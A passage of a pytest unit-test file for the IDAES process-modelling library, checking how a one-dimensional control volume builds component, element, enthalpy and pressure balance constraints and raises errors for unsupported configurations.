        return m.fs.cv.test_var[t, j]*units.kg/units.s/units.m

    # Provide molecular weights so the mass term can be converted to moles
    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            m.fs.cv.properties[t, x].mw_comp = Var(
                m.fs.cv.properties[t, x].config.parameters.component_list,
                units=units.kg/units.mol)
    mb = m.fs.cv.add_total_component_balances(custom_mass_term=custom_method)
    assert isinstance(mb, Constraint)
    assert len(mb) == 2
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_custom_mass_term_undefined_basis():
    """A custom mass term with an undefined material basis must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 3  # neither molar nor mass basis
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(
        m.fs.cv.flowsheet().config.time,
        m.fs.pp.component_list,
    )

    def custom_method(t, x, j):
        return m.fs.cv.test_var[t, j]

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_total_component_balances(custom_mass_term=custom_method)
# -----------------------------------------------------------------------------
# Test add_total_element_balances
@pytest.mark.unit
def test_add_total_element_balances_default():
    """BACKWARD scheme: element balances skip the inlet node (x = 0)."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    bal = m.fs.cv.add_total_element_balances()

    assert isinstance(bal, Constraint)
    assert len(bal) == 3
    for j in m.fs.pp.element_list:
        # Backward scheme skips x = 0; constraint exists only at x = 1
        with pytest.raises(KeyError):
            assert m.fs.cv.element_balances[0, 0, j]
        assert type(m.fs.cv.element_balances[0, 1, j]) is \
            _GeneralConstraintData
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_default_FFD():
    """FORWARD scheme: element balances skip the outlet node (x = 1)."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "FORWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    bal = m.fs.cv.add_total_element_balances()

    assert isinstance(bal, Constraint)
    assert len(bal) == 3
    for j in m.fs.pp.element_list:
        # Forward scheme skips x = 1; constraint exists only at x = 0
        with pytest.raises(KeyError):
            assert m.fs.cv.element_balances[0, 1, j]
        assert type(m.fs.cv.element_balances[0, 0, j]) is \
            _GeneralConstraintData
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_distrubuted_area():
    """Element balances also build with a distributed (variant) area."""
    # NOTE(review): "distrubuted" in the name is a typo for "distributed";
    # kept to preserve the pytest-visible test id.
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
        "area_definition": DistributedVars.variant,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    bal = m.fs.cv.add_total_element_balances()

    assert isinstance(bal, Constraint)
    assert len(bal) == 3
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_properties_not_supported():
    """A property package without an element_list must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    # Remove the element list to trigger the error
    m.fs.pp.del_component(m.fs.pp.element_list)
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(PropertyNotSupportedError):
        m.fs.cv.add_total_element_balances()
@pytest.mark.unit
def test_add_total_element_balances_dynamic():
    """Dynamic mode adds element holdup/accumulation variables."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": True, "time_units": units.s})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
        "dynamic": True,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    bal = m.fs.cv.add_total_element_balances()

    assert isinstance(bal, Constraint)
    assert len(bal) == 6
    assert isinstance(m.fs.cv.phase_fraction, Var)
    assert isinstance(m.fs.cv.element_holdup, Var)
    assert isinstance(m.fs.cv.element_accumulation, Var)
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_rate_rxns():
    """Rate reactions are not supported in element balances."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_total_element_balances(has_rate_reactions=True)
@pytest.mark.unit
def test_add_total_element_balances_eq_rxns():
    """Equilibrium reactions are not supported in element balances."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_total_element_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_total_element_balances_phase_eq():
    """Phase equilibrium is not supported in element balances."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_total_element_balances(has_phase_equilibrium=True)
@pytest.mark.unit
def test_add_total_element_balances_mass_transfer():
    """has_mass_transfer adds an elemental_mass_transfer_term variable."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    bal = m.fs.cv.add_total_element_balances(has_mass_transfer=True)

    assert isinstance(bal, Constraint)
    assert len(bal) == 3
    assert isinstance(m.fs.cv.elemental_mass_transfer_term, Var)
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_custom_term():
    """A custom elemental term with consistent units builds cleanly."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(
        m.fs.cv.flowsheet().config.time,
        m.fs.pp.element_list,
    )

    def custom_method(t, x, e):
        return m.fs.cv.test_var[t, e] * units.mol / units.s / units.m

    bal = m.fs.cv.add_total_element_balances(
        custom_elemental_term=custom_method)

    assert isinstance(bal, Constraint)
    assert len(bal) == 3
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_lineraly_dependent(caplog):
    """Linearly dependent element balances are detected, logged, and skipped."""
    # NOTE(review): "lineraly" in the name is a typo for "linearly";
    # kept to preserve the pytest-visible test id.
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    # Change the elemental composition to introduce a linear dependency
    m.fs.pp.element_comp = {"c1": {"H": 0, "He": 0, "Li": 1},
                            "c2": {"H": 1, "He": 2, "Li": 0}}
    cv_args = {
        "property_package": m.fs.pp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)

    bal = m.fs.cv.add_total_element_balances()

    # Check that the logger message was recorded at the right level
    msg = ("fs.cv detected linearly dependent element balance equations. "
           "Element balances will NOT be written for the following elements: "
           "['He']")
    assert msg in caplog.text
    for record in caplog.records:
        assert record.levelno == idaeslog.INFO_LOW
    assert isinstance(bal, Constraint)
    assert len(bal) == 2
    for i in bal:
        # No constraints at x = 0; H and Li are independent and get
        # constraints, while He is linearly dependent on H and is skipped
        assert i in [(0, 1, "H"), (0, 1, "Li")]
    assert_units_consistent(m)
# -----------------------------------------------------------------------------
# Test unsupported material balance types
@pytest.mark.unit
def test_add_total_material_balances():
    """add_total_material_balances raises BalanceTypeNotSupportedError for 1D CVs."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.pp.del_component(model.fs.pp.phase_equilibrium_idx)
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(BalanceTypeNotSupportedError):
        model.fs.cv.add_total_material_balances()
# -----------------------------------------------------------------------------
# Test add_energy_balances default
@pytest.mark.unit
def test_add_energy_balances_default_fail():
    """useDefault energy balance raises ConfigurationError for an invalid switch."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    # Force the property package to report an unrecognised default balance type
    model.fs.pp.default_balance_switch = 2

    with pytest.raises(ConfigurationError):
        model.fs.cv.add_energy_balances(EnergyBalanceType.useDefault)
@pytest.mark.unit
def test_add_energy_balances_default():
    """useDefault energy balance builds a single total enthalpy balance."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    balances = model.fs.cv.add_energy_balances(EnergyBalanceType.useDefault)

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    assert isinstance(model.fs.cv._enthalpy_flow, Var)
    assert isinstance(model.fs.cv.enthalpy_flow_linking_constraint, Constraint)
    assert isinstance(model.fs.cv.enthalpy_flow_dx, DerivativeVar)

    # BACKWARD scheme: no constraint at the inlet (x = 0), one at x = 1
    with pytest.raises(KeyError):
        assert model.fs.cv.enthalpy_balances[0, 0]
    assert type(model.fs.cv.enthalpy_balances[0, 1]) is _GeneralConstraintData

    assert_units_consistent(model)
# -----------------------------------------------------------------------------
# Test phase enthalpy balances
@pytest.mark.unit
def test_add_total_enthalpy_balances_default():
    """Default total enthalpy balance with BACKWARD finite differences."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    balances = model.fs.cv.add_total_enthalpy_balances()

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    assert isinstance(model.fs.cv._enthalpy_flow, Var)
    assert isinstance(model.fs.cv.enthalpy_flow_linking_constraint, Constraint)
    assert isinstance(model.fs.cv.enthalpy_flow_dx, DerivativeVar)

    # BACKWARD scheme: no constraint at the inlet (x = 0), one at x = 1
    with pytest.raises(KeyError):
        assert model.fs.cv.enthalpy_balances[0, 0]
    assert type(model.fs.cv.enthalpy_balances[0, 1]) is _GeneralConstraintData

    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_enthalpy_balances_default_FFD():
    """Total enthalpy balance with FORWARD finite differences skips the outlet."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "FORWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    balances = model.fs.cv.add_total_enthalpy_balances()

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    assert isinstance(model.fs.cv._enthalpy_flow, Var)
    assert isinstance(model.fs.cv.enthalpy_flow_linking_constraint, Constraint)
    assert isinstance(model.fs.cv.enthalpy_flow_dx, DerivativeVar)

    # FORWARD scheme: no constraint at the outlet (x = 1), one at x = 0
    with pytest.raises(KeyError):
        assert model.fs.cv.enthalpy_balances[0, 1]
    assert type(model.fs.cv.enthalpy_balances[0, 0]) is _GeneralConstraintData

    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_enthalpy_balances_distributed_area():
    """Total enthalpy balance builds correctly with a spatially-varying area."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
        "area_definition": DistributedVars.variant})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    balances = model.fs.cv.add_total_enthalpy_balances()

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    assert isinstance(model.fs.cv._enthalpy_flow, Var)
    assert isinstance(model.fs.cv.enthalpy_flow_linking_constraint, Constraint)
    assert isinstance(model.fs.cv.enthalpy_flow_dx, DerivativeVar)
    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_enthalpy_balances_dynamic():
    """Dynamic total enthalpy balance adds holdup and accumulation terms."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": True, "time_units": units.s})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
        "dynamic": True})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    balances = model.fs.cv.add_total_enthalpy_balances()

    assert isinstance(balances, Constraint)
    assert len(balances) == 2
    assert isinstance(model.fs.cv.phase_fraction, Var)
    assert isinstance(model.fs.cv.energy_holdup, Var)
    assert isinstance(model.fs.cv.energy_accumulation, Var)
    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_enthalpy_balances_heat_transfer():
    """has_heat_transfer=True adds a heat Var to the enthalpy balance."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    balances = model.fs.cv.add_total_enthalpy_balances(has_heat_transfer=True)

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    assert isinstance(model.fs.cv.heat, Var)
    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_enthalpy_balances_work_transfer():
    """has_work_transfer=True adds a work Var to the enthalpy balance."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    balances = model.fs.cv.add_total_enthalpy_balances(has_work_transfer=True)

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    assert isinstance(model.fs.cv.work, Var)
    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_enthalpy_balances_enthalpy_transfer():
    """has_enthalpy_transfer=True adds an enthalpy_transfer Var to the balance."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    balances = model.fs.cv.add_total_enthalpy_balances(
        has_enthalpy_transfer=True)

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    assert isinstance(model.fs.cv.enthalpy_transfer, Var)
    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_enthalpy_balances_custom_term():
    """A user-supplied custom term is accepted by the total enthalpy balance."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    model.fs.cv.test_var = Var(model.fs.cv.flowsheet().config.time)

    def custom_method(t, x):
        # Custom term must carry energy-per-length-per-time units
        return model.fs.cv.test_var[t] * units.J / units.s / units.m

    balances = model.fs.cv.add_total_enthalpy_balances(
        custom_term=custom_method)

    assert isinstance(balances, Constraint)
    assert len(balances) == 1
    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_enthalpy_balances_dh_rxn_no_extents():
    """Heat of reaction without prior reaction extents raises ConfigurationError."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    # No material balances added, so there are no reaction extent terms
    with pytest.raises(ConfigurationError):
        model.fs.cv.add_total_enthalpy_balances(has_heat_of_reaction=True)
@pytest.mark.unit
def test_add_total_enthalpy_balances_dh_rxn_rate_rxns():
    """Heat of reaction builds from rate-reaction extents when they exist."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    # Material balances with rate reactions provide the extent terms
    model.fs.cv.add_phase_component_balances(has_rate_reactions=True)
    model.fs.cv.add_total_enthalpy_balances(has_heat_of_reaction=True)

    assert isinstance(model.fs.cv.heat_of_reaction, Expression)
    assert_units_consistent(model)
@pytest.mark.unit
def test_add_total_enthalpy_balances_dh_rxn_equil_rxns():
    """Heat of reaction builds from equilibrium-reaction extents when they exist."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=True)

    # Material balances with equilibrium reactions provide the extent terms
    model.fs.cv.add_phase_component_balances(has_equilibrium_reactions=True)
    model.fs.cv.add_total_enthalpy_balances(has_heat_of_reaction=True)

    assert isinstance(model.fs.cv.heat_of_reaction, Expression)
    assert_units_consistent(model)
# -----------------------------------------------------------------------------
# Test unsupported energy balance types
@pytest.mark.unit
def test_add_phase_enthalpy_balances():
    """add_phase_enthalpy_balances raises BalanceTypeNotSupportedError for 1D CVs."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.pp.del_component(model.fs.pp.phase_equilibrium_idx)
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(BalanceTypeNotSupportedError):
        model.fs.cv.add_phase_enthalpy_balances()
@pytest.mark.unit
def test_add_phase_energy_balances():
    """add_phase_energy_balances raises BalanceTypeNotSupportedError for 1D CVs."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.pp.del_component(model.fs.pp.phase_equilibrium_idx)
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(BalanceTypeNotSupportedError):
        model.fs.cv.add_phase_energy_balances()
@pytest.mark.unit
def test_add_total_energy_balances():
    """add_total_energy_balances raises BalanceTypeNotSupportedError for 1D CVs."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.pp.del_component(model.fs.pp.phase_equilibrium_idx)
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(BalanceTypeNotSupportedError):
        model.fs.cv.add_total_energy_balances()
# -----------------------------------------------------------------------------
# Test add total pressure balances
@pytest.mark.unit
def test_add_total_pressure_balances_default():
    """Default total pressure balance with BACKWARD finite differences."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    model.fs.cv = ControlVolume1DBlock(default={
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

